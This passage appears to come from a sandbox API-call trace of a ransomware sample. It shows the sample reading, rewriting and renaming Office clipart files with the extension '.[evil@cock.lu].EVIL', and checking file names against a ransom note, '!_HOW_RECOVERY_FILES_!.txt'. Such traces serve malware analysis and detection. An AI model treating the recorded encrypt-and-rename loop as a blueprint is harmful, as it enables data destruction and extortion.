Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.744] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.744] __uncaught_exception () returned 0x84b1160800 [0130.744] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.744] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099182.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099182.wmf.[evil@cock.lu].evil")) returned 1 [0130.745] ??_V@YAXPEAX@Z () returned 0x1 [0130.748] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF", dwFileAttributes=0x200) returned 0 [0130.748] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.748] wcsstr (_Str="J0099183.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.748] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF") returned 69 [0130.748] wcscmp (_String1="J0099183.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.748] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099183.WMF") returned 0x0 [0130.748] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF") returned 0x45 [0130.748] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099183.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.750] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1352, lpOverlapped=0x0) returned 1 [0130.757] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.757] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.757] _errno () returned 0x84b1160840 [0130.757] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.757] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1360, lpOverlapped=0x0) returned 1 [0130.757] CloseHandle (hObject=0x1a8) returned 1 [0130.757] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.757] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.757] __uncaught_exception () returned 0x84b1160800 [0130.757] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.758] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099183.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099183.wmf.[evil@cock.lu].evil")) returned 1 [0130.758] ??_V@YAXPEAX@Z () returned 0x1 [0130.761] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF", dwFileAttributes=0x200) returned 0 [0130.761] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.761] wcsstr (_Str="J0099184.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.761] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF") returned 69 [0130.761] wcscmp (_String1="J0099184.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.761] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099184.WMF") returned 0x0 [0130.761] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF") returned 0x45 [0130.761] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099184.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.763] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1016, lpOverlapped=0x0) returned 1 [0130.787] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.787] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.788] _errno () returned 0x84b1160840 [0130.788] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.788] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1020, lpOverlapped=0x0) returned 1 [0130.788] CloseHandle (hObject=0x1a8) returned 1 [0130.788] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.788] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.788] __uncaught_exception () returned 0x84b1160800 [0130.788] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.788] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099184.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099184.wmf.[evil@cock.lu].evil")) returned 1 [0130.789] ??_V@YAXPEAX@Z () returned 0x1 [0130.792] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF", dwFileAttributes=0x200) returned 0 [0130.792] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.792] wcsstr (_Str="J0099185.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.792] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG") returned 69 [0130.792] wcscmp (_String1="J0099185.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.792] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099185.JPG") returned 0x0 [0130.792] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG") returned 0x45 [0130.792] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099185.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.794] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xcd2, lpOverlapped=0x0) returned 1 [0130.814] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.814] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.814] _errno () returned 0x84b1160840 [0130.814] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.814] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xce0, lpOverlapped=0x0) returned 1 [0130.814] CloseHandle (hObject=0x1a8) returned 1 [0130.814] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.815] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.815] __uncaught_exception () returned 0x84b1160800 [0130.815] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.815] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099185.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099185.jpg.[evil@cock.lu].evil")) returned 1 [0130.816] ??_V@YAXPEAX@Z () returned 0x1 [0130.818] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG", dwFileAttributes=0x200) returned 0 [0130.818] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.818] wcsstr (_Str="J0099186.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.818] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG") returned 69 [0130.818] wcscmp (_String1="J0099186.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.818] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099186.JPG") returned 0x0 [0130.819] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG") returned 0x45 [0130.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099186.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.820] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4162, lpOverlapped=0x0) returned 1 [0130.840] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.840] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.840] _errno () returned 0x84b1160840 [0130.840] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.840] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x4180, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4180, lpOverlapped=0x0) returned 1 [0130.840] CloseHandle (hObject=0x1a8) returned 1 [0130.840] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.840] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.840] __uncaught_exception () returned 0x84b1160800 [0130.840] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.841] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099186.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099186.jpg.[evil@cock.lu].evil")) returned 1 [0130.851] ??_V@YAXPEAX@Z () returned 0x1 [0130.853] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099186.JPG", dwFileAttributes=0x200) returned 0 [0130.854] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.854] wcsstr (_Str="J0099187.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.854] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG") returned 69 [0130.854] wcscmp (_String1="J0099187.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.854] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099187.JPG") returned 0x0 [0130.854] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG") returned 0x45 [0130.854] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099187.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.855] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5fd0, lpOverlapped=0x0) returned 1 [0130.873] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.873] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.873] _errno () returned 0x84b1160840 [0130.873] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.873] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x5fe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5fe0, lpOverlapped=0x0) returned 1 [0130.873] CloseHandle (hObject=0x1a8) returned 1 [0130.873] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.873] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.873] __uncaught_exception () returned 0x84b1160800 [0130.873] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.874] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099187.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099187.jpg.[evil@cock.lu].evil")) returned 1 [0130.874] ??_V@YAXPEAX@Z () returned 0x1 [0130.878] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099187.JPG", dwFileAttributes=0x200) returned 0 [0130.878] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.878] wcsstr (_Str="J0099188.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.878] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG") returned 69 [0130.878] wcscmp (_String1="J0099188.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.878] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099188.JPG") returned 0x0 [0130.878] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG") returned 0x45 [0130.878] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099188.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.880] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2378, lpOverlapped=0x0) returned 1 [0130.887] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.887] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.887] _errno () returned 0x84b1160840 [0130.887] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.887] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2380, lpOverlapped=0x0) returned 1 [0130.887] CloseHandle (hObject=0x1a8) returned 1 [0130.887] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.888] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.888] __uncaught_exception () returned 0x84b1160800 [0130.888] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.888] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099188.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099188.jpg.[evil@cock.lu].evil")) returned 1 [0130.889] ??_V@YAXPEAX@Z () returned 0x1 [0130.891] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG", dwFileAttributes=0x200) returned 0 [0130.892] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.892] wcsstr (_Str="J0099189.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.892] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG") returned 69 [0130.892] wcscmp (_String1="J0099189.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.892] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099189.JPG") returned 0x0 [0130.892] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG") returned 0x45 [0130.892] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099189.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.894] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f8c, lpOverlapped=0x0) returned 1 [0130.914] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.914] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.914] _errno () returned 0x84b1160840 [0130.914] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.914] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1fa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1fa0, lpOverlapped=0x0) returned 1 [0130.914] CloseHandle (hObject=0x1a8) returned 1 [0130.914] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.915] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.915] __uncaught_exception () returned 0x84b1160800 [0130.915] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.915] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099189.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099189.jpg.[evil@cock.lu].evil")) returned 1 [0130.932] ??_V@YAXPEAX@Z () returned 0x1 [0130.935] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG", dwFileAttributes=0x200) returned 0 [0130.935] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.935] wcsstr (_Str="J0099190.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.935] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG") returned 69 [0130.935] wcscmp (_String1="J0099190.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.935] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099190.JPG") returned 0x0 [0130.935] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG") returned 0x45 [0130.935] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099190.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.937] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xab74, lpOverlapped=0x0) returned 1 [0130.955] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.955] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.955] _errno () returned 0x84b1160840 [0130.955] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.956] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xab80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xab80, lpOverlapped=0x0) returned 1 [0130.956] CloseHandle (hObject=0x1a8) returned 1 [0130.956] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.956] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.956] __uncaught_exception () returned 0x84b1160800 [0130.956] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.956] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099190.jpg"), lpNewFileName="C:\\\\Program 